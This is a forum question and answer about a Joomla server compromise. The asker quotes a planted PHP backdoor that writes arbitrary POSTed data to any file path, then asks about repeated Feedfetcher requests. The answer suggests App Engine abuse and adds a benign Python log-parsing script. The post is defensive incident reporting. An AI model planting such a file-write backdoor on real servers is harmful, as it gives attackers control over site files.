My server was recently compromised due to Joomla and allow_url_fopen = ON. I see various PHP files on my server root having this content in them:
Restricted accoss
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);
So I closed allow_url_fopen and deleted all of these files. Now my site runs fine for a few minutes, but it makes requests every few seconds to this address, giving this message in error_log:
[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml
This I see in access_log lots of times:
74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
So is it normal?
Answer
Looks like someone's abusing Google App Engine. Check your Apache access log for that IP address, and the user agent string should have their app ID. You can then report the abuse to Google.
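One way to carry out the access-log check suggested in the answer, as an added example that is not part of the original post: it groups requests for /index.xml by client IP and user agent, and pulls out an "appid:" token when the user agent carries one. Only the Feedfetcher line comes from the question; the other sample lines are constructed, and the "appid: ..." user-agent shape is an assumption.

```python
import re
from collections import Counter

# Apache combined log format:
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Assumed shape of an App Engine fetch user agent: "...; appid: s~name)"
APPID_RE = re.compile(r'appid:\s*([^\s;)]+)')

FEEDFETCHER = ('Mozilla/5.0 (compatible) Feedfetcher-Google; '
               '(+google.com/feedfetcher.html)')

# First line is from the question; the rest are constructed sample data.
SAMPLE_LOG = [
    '74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] '
    '"GET /index.xml HTTP/1.1" 404 293 "-" "%s"' % FEEDFETCHER,
    '74.125.179.86 - - [07/Mar/2013:00:15:44 +0000] '
    '"GET /index.xml HTTP/1.1" 404 293 "-" "%s"' % FEEDFETCHER,
    '192.0.2.10 - - [07/Mar/2013:00:15:50 +0000] '
    '"GET /index.xml?x=1 HTTP/1.1" 404 293 "-" '
    '"AppEngine-Google; (+http://code.google.com/appengine; '
    'appid: s~example-app)"',
    '198.51.100.7 - - [07/Mar/2013:00:16:01 +0000] '
    '"GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def summarize(lines, path="/index.xml"):
    """Count requests for `path` per (client IP, user agent, app ID)."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        # Skip unparsable lines and other paths (query string ignored).
        if not m or m.group("path").split("?", 1)[0] != path:
            continue
        agent = m.group("agent")
        app = APPID_RE.search(agent)
        key = (m.group("ip"), agent, app.group(1) if app else None)
        hits[key] += 1
    return hits

if __name__ == "__main__":
    for (ip, agent, appid), n in summarize(SAMPLE_LOG).most_common():
        print("%4d  %-15s  appid=%s  %s" % (n, ip, appid or "-", agent))
```

Pointing it at the real access_log (open the file and pass the file object as lines) shows how many distinct clients and user agents are behind the repeated /index.xml requests.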